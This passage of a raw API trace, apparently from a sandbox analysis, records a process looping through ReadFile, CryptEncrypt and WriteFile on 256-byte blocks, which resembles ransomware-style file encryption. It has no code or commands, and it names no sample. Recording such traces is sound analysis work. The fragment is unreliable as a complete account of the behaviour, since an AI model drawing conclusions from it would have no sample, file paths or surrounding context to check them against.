lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.610] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.610] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.610] GetLastError () returned 0x0 [0143.610] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.610] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.610] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.610] GetLastError () returned 0x0 [0143.610] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.610] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.610] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.610] GetLastError () returned 0x0 [0143.610] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.610] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.610] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.610] GetLastError () returned 0x0 [0143.610] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.610] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.610] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.610] GetLastError () returned 0x0 [0143.610] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.610] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.610] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.610] GetLastError () returned 0x0 [0143.610] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.611] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.611] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.611] GetLastError () returned 0x0 [0143.611] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.611] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.611] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.611] GetLastError () returned 0x0 [0143.611] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.611] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.611] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.611] GetLastError () returned 0x0 [0143.611] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.611] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.611] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.611] GetLastError () returned 0x0 [0143.611] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.611] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.611] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.613] GetLastError () returned 0x0 [0143.613] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.613] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.613] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.614] GetLastError () returned 0x0 [0143.614] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.614] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.614] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.614] GetLastError () returned 0x0 [0143.614] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.614] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.614] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.614] GetLastError () returned 0x0 [0143.614] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.614] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.614] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.614] GetLastError () returned 0x0 [0143.614] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.614] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.614] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.614] GetLastError () returned 0x0 [0143.614] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.614] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.614] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.614] GetLastError () returned 0x0 [0143.614] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.614] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.614] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.614] GetLastError () returned 0x0 [0143.614] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.614] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.615] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.615] GetLastError () returned 0x0 [0143.615] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.615] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.615] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.615] GetLastError () returned 0x0 [0143.615] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.615] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.615] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.615] GetLastError () returned 0x0 [0143.615] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.615] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.615] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.615] GetLastError () returned 0x0 [0143.615] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.615] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.615] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.615] GetLastError () returned 0x0 [0143.615] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.615] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.615] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.615] GetLastError () returned 0x0 [0143.615] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.615] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.615] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.615] GetLastError () returned 0x0 [0143.615] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.616] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.616] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.616] GetLastError () returned 0x0 [0143.616] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.616] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.616] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.616] GetLastError () returned 0x0 [0143.616] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.616] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.616] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.616] GetLastError () returned 0x0 [0143.616] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.616] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.616] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.616] GetLastError () returned 0x0 [0143.616] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.616] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.616] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.616] GetLastError () returned 0x0 [0143.616] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.616] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.616] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.616] GetLastError () returned 0x0 [0143.616] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.617] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.617] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.617] GetLastError () returned 0x0 [0143.617] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.617] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, 